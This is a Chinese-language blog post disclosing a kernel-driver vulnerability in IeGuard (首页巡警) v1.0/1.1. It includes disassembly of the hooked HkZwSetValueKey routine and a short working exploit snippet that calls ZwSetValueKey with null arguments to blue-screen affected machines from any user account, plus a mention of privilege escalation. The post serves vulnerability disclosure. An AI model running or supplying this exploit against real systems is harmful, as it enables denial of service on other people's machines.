作者:MJ0011
来源:MJ0011的内核驱动研究所
首页巡警v1.1/1.0的内核驱动程序存在严重漏洞,安装了首页巡警v1.1(v1.0)的机器,任意权限的用户可导致系统蓝屏(BSOD),造成拒绝服务攻击
结合我之前公布的SystemCrashDumpInformation加载驱动方式,可以在安装了HIPS的机器上造成本地提权漏洞,即任意权限的用户可以加载驱动到内核并执行。出问题的函数是IeGuard.sys!HkZwSetValueKey。
该函数的第三个参数是PUNICODE_STRING ValueName
IeGuard没有对参数做任何检查就使用RtlCompareUnicodeString函数对该值进行判断,只要在RING3对此参数置0,IeGuard将立即导致系统蓝屏

相关汇编代码:
.text:00011430 HkZwSetValueKey proc near                ; DATA XREF: HookKeyRoutine+52 o
.text:00011430                                          ; sub_11B66+45 o
.text:00011430
.text:00011430 StartPageUniName= UNICODE_STRING ptr -14h
.text:00011430 var_C            = dword ptr -0Ch
.text:00011430 Object           = dword ptr -8
.text:00011430 isPass           = byte ptr -1
.text:00011430 Handle           = dword ptr  8
.text:00011430 ValueName        = dword ptr  0Ch
.text:00011430 arg_8            = dword ptr  10h
.text:00011430 arg_C            = dword ptr  14h
.text:00011430 arg_10           = dword ptr  18h
.text:00011430 arg_14           = dword ptr  1Ch
.text:00011430
.text:00011430                  mov      edi, edi
.text:00011432                  push     ebp
.text:00011433                  mov      ebp, esp
.text:00011435                  sub      esp, 14h
.text:00011438                  push     ebx
.text:00011439                  xor      ebx, ebx
.text:0001143B                  mov      [ebp+isPass], bl
.text:0001143E                  call     ds:ExGetPreviousMode
.text:00011444                  cmp      al, 1
.text:00011446                  jnz      loc_114FA
.text:00011446
.text:0001144C                  push     offset str_StartPage ; SourceString
.text:00011451                  lea      eax, [ebp+StartPageUniName]
.text:00011454                  push     eax              ; DestinationString
.text:00011455                  call     ds:RtlInitUnicodeString
.text:0001145B                  push     1                ; CaseInSensitive
.text:0001145D                  push     [ebp+ValueName] ; String2
.text:00011460                  lea      eax, [ebp+StartPageUniName]
.text:00011463                  push     eax              ; String1
.text:00011464                  call     ds:RtlCompareUnicodeString

<—此处未做任何判断就将ValueName传递给RtlCompareUnicodeString

导致蓝屏
.text:0001146A                  test     eax, eax
.text:0001146C                  jnz      loc_114FA

利用代码(该代码运行后即可导致安装了首页巡警的机器立即蓝屏,可在任意用户权限下执行)
HMODULE hlib = LoadLibrary("ntdll.dll");
PVOID p = GetProcAddress(hlib , "ZwSetValueKey");
__asm
{
push 0
push 0
push 0
push 0
push 0
push 0
call p

}

测试程序下载:
http://www.debugman.com/read.php?tid=1330
或:
http://mj0011.ys168.com/ 漏洞演示\IeGuardLeakTest.rar
Bug&Exp | Comments(0) | Trackbacks(0) | Reads(6240)
Add a comment
Emots
emotemotemotemotemot
emotemotemotemotemot
emotemotemotemotemot
emotemotemotemotemot
emotemotemotemotemot
Enable HTML
Enable UBB
Enable Emots
Hidden
Nickname   Password   Optional
Site URI   Email   [Register]
               

Security code Case insensitive